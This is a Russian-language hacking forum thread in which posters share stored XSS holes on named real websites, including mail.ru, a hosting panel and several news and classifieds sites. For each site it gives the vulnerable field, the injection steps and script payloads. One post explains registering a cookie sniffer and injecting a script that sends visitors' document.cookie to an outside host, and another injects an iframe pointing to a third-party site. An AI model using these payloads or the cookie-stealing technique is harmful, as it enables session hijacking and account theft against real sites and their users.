http://www.oops.ru/stat/se.php активная xss на официальном российском сайте популярного журнала OOPS описание тут: https://forum.antichat.ru/thread55136.html
http://www.qr.ru/stat/se.php активная xss на официальном российском сайте популярного журнала Quattroruote описание тут: https://forum.antichat.ru/thread55136.html
Простенькая активка на My.mail.ru Заходим в раздел *Желания* ->>Добавить желание... Уязвимо поле *Метки* ... Пример Code: http://my.mail.ru/my/wishlist?wish=313616 С Новым Годом) P.S Активка уже не работает....10 часов прожила) .ПРЕВЕД АДМИНАМ МАЙЛА..И ЛИЧНО ЗАКЕРУ.....Знаю ещё одну..но больше не надейтесь, что я тут выложу)
Активная XSS на http://www.scandasia.com/ Уязвимость в комментариях к новостям в поле Your comment: Например: http://www.scandasia.com/viewNews.php?coun_code=dk&news_id=4009
www.todj.ua - главный клубный портал Украины В своем профиле, в разделе фото: topdj.ua/clubbers/ваш_id/photo/ создаем новую галерею и в поле "название" вписываем js-код. Поле "клуб" вообще нигде не отображается, а "описание"- фильтруется. Found by: /me
Вот моя активная xss: _http://job.properm.ru/ _http://auto.properm.ru/ Заполняем вакансию, резюме, объявление, и в поле ФИО пишем Code: Иванов Иван <script>alert(/ xss /)</script> Заходим на сайт _http://www.virtualflowers.ru/abook.php Регестрируемся [ регистрация там фуфло какое-то ] Добавить адресата - в каментах Code: <script>alert(/ Dreel /)</script> Бесплатные объявления Киева Заходим по адресу http://www.slando.com.ua и тыкаем кнопочку "подать объявление" продажа авто, уязвимо поле модель: <script>alert(/ D /)</script> Есть один недостаток - максимум 30 символов.
ero-club.ru В своем профиле давим "добавить новое фото" - создаем новый альбом и в поле"Название" пишем ядовитый код HTML: <script>alert(/iddqd/)</script>
http://news.nag.ru/news/root/crnews/ Уязвимы комментарии. Code: http://news.nag.ru/news/root/crnews/story15827/
PHP: http://s.netsec.ru/ регистрируй там сниффер PHP: http://s.netsec.ru/Твой_Логин.gif адрес твоего сниффера PHP: <a href="http://s.netsec.ru/Твой_Логин.gif?test">click me</a> вызов по ссылке PHP: <img src="http://s.netsec.ru/Твой_Логин.gif"> код HTML PHP: <script>img = new Image(); img.src = "http://s.netsec.ru/Твой_Логин.gif?"+document.cookie;</script> вызов из скрипта GreenBear Сниффер от netsec.ru http://forum.antichat.ru/thread36829-%F1%ED%E8%F4%F4%E5%F0.html
www.shinovozoff.ru - онлайн магазин авто-товаров http://www.shinovozoff.ru/guestbook/ уязвимы все поля ввода, результат =)
www.jino-net.ru у себя в контрольной панели в поле подсказка пароля пишешь: Code: <script>alert(document.cookie)</script> Затем идёшь восстанавливать пароль: www.jino-net.ru/lostpass.phtml?login=ЛОГИН и выскакивает алерт с куками
Code: gamer.kraslan.ru в поле комментов втыкаем Code: <iframe src= http://you-money.100webspace.net < рабочая версия Code: http://gamer.crownet.ru/index.php?name=Game&pa=preview_game&id=791
auto05.ru Code: http://www.auto05.ru/guestbook.html?page=1 Уязвимо поле комментариев. redyarsk.ru Code: http://www.redyarsk.ru/gb/index.php?t=1&all= Уязвимо поле комментариев.
уууу блин http://www.pressofatlanticcity.com постим коммент к новости Code: <IMG """><SCRIPT>alert("master gen")</SCRIPT>"> получам рабочий вариант ! http://www.pressofatlanticcity.com/188/story/84175.html
http://edsh.org/diskutime/post.php?action=edit&%20fid=24&tid=1172&pid=4303 в заголовке (Subjekti) пишите: <script>alert(/n1k70/)</script>
Вот http://www.lugarus.com/users/haruka0000/ Сам скрипт прописывать в личном кабинете (зарегится надо) в поле "О себе".
